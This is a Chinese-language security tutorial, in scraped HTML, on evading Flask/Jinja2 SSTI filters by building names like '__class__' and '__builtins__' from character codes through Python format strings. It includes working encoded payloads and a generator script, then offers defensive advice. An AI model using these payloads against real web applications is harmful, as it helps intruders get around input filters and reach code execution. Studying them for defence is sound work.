Python字符串格式化特性绕过SSTI过滤技术详解<\/h1>

00x0 前置知识<\/h2>

SSTI基本绕过技术<\/h3>

点号绕过<\/strong>：<\/p>

传统方式："".__class__<\/code><\/li>
绕过方式：""["__class__"]<\/code><\/li> <\/ul> <\/li>
字符串拼接绕过关键字过滤<\/strong>：<\/p> ""["__cla"+"ss__"]<\/code><\/li> <\/ul> <\/li> 使用attr<\/code>和request<\/code>参数绕过下划线过滤<\/strong>：<\/p> |attr(request['args']['x1'])<\/code><\/li> 当|<\/code>被过滤时，需要寻找其他方法<\/li> <\/ul> <\/li> <\/ol> 00x1 Python的格式化字符串特性<\/h2> 核心绕过技术<\/h3> Python字符串格式化允许通过ASCII码指定字符：<\/p> >>><\/span> '<\/span>{0:c}<\/span>'<\/span>.<\/span>format(98<\/span>) <\/span><\/span>'b'<\/span> <\/span><\/span><\/code><\/pre>在Flask模板中的应用：<\/p> "<\/span>{0:c}<\/span>"<\/span>["format"<\/span>](98<\/span>) # 等同于 'b'<\/span> <\/span><\/span><\/code><\/pre>构造__class__<\/code>字符串<\/h3> 通过ASCII码拼接关键字符串：<\/p> {{""['{0:c}'['format'](95)%2b'{0:c}'['format'](95)%2b'{0:c}'['format'](99)%2b'{0:c}'['format'](108)%2b'{0:c}'['format'](97)%2b'{0:c}'['format'](115)%2b'{0:c}'['format'](115)%2b'{0:c}'['format'](95)%2b'{0:c}'['format'](95)]}} <\/code><\/pre> (注意：+<\/code>号需要编码为%2b<\/code>)<\/p> 自动化编码工具<\/h3> 编码脚本：<\/p> import<\/span> re <\/span><\/span> <\/span><\/span>def<\/span> product<\/span>(poc): <\/span><\/span> payload =<\/span> ''<\/span> <\/span><\/span> for<\/span> chr in<\/span> poc: <\/span><\/span> model =<\/span> "'<\/span>{0:c}<\/span>'['format'](<\/span>%d<\/span>)"<\/span> %<\/span> ord(chr) <\/span><\/span> payload +=<\/span> model +<\/span> '+'<\/span> <\/span><\/span> return<\/span> payload[:-<\/span>1<\/span>] <\/span><\/span> <\/span><\/span>a =<\/span> product('__builtins__'<\/span>).<\/span>replace('+'<\/span>, "%2b"<\/span>) <\/span><\/span>print(a) <\/span><\/span> <\/span><\/span>def<\/span> decode<\/span>(payload): <\/span><\/span> res =<\/span> re.<\/span>findall("$\d+$"<\/span>, payload) <\/span><\/span> for<\/span> i in<\/span> res: <\/span><\/span> print(chr(int(i[1<\/span>:-<\/span>1<\/span>])), end =<\/span> ""<\/span>) <\/span><\/span> <\/span><\/span>decode(a) <\/span><\/span><\/code><\/pre>00x2 扩展技术<\/h2> 其他格式化方法<\/h3> 使用%<\/code>格式化<\/strong>：<\/p> >>><\/span> '<\/span>%c<\/span>'<\/span> %<\/span> 98<\/span> <\/span><\/span>'b'<\/span> <\/span><\/span><\/code><\/pre>在Flask模板中的应用：<\/p> {{""<\/span>["<\/span>%c%%<\/span>c<\/span>%%<\/span>c<\/span>%%<\/span>c<\/span>%%<\/span>c<\/span>%%<\/span>c<\/span>%%<\/span>c<\/span>%%<\/span>c"<\/span>%<\/span>(95<\/span>,95<\/span>,99<\/span>,108<\/span>,97<\/span>,115<\/span>,115<\/span>,95<\/span>,95<\/span>)]}} <\/span><\/span><\/code><\/pre><\/li> 尝试f-string（未成功）<\/strong>：<\/p> Flask模板引擎将{}<\/code>视为模板变量标识符<\/li> 目前尚未找到在Flask模板中使用f-string执行命令的方法<\/li> <\/ul> <\/li> <\/ol> 技术特点分析<\/h2> 优点<\/strong>：<\/p> 可以绕过严格的字符过滤（如下划线、点号、特定关键字等）<\/li> 提供了一种新的绕过思路<\/li> <\/ul> <\/li> 缺点<\/strong>：<\/p> 生成的payload长度显著增加<\/li> 可读性差，难以手动构造<\/li> 需要多次测试和调整<\/li> <\/ul> <\/li> <\/ol> 防御建议<\/h2> 不要直接将用户输入作为模板渲染<\/li> 使用更严格的模板引擎或沙箱环境<\/li> 对用户输入进行多重过滤和验证<\/li> 禁用危险的Python内置函数和属性<\/li> <\/ol> 总结<\/h2> 这种利用Python字符串格式化特性绕过SSTI过滤的方法展示了Python灵活的语言特性如何被用于安全绕过。虽然payload较长且复杂，但在严格的过滤环境下可能成为有效的绕过手段。安全开发者应了解此类技术以更好地防御潜在攻击。<\/p>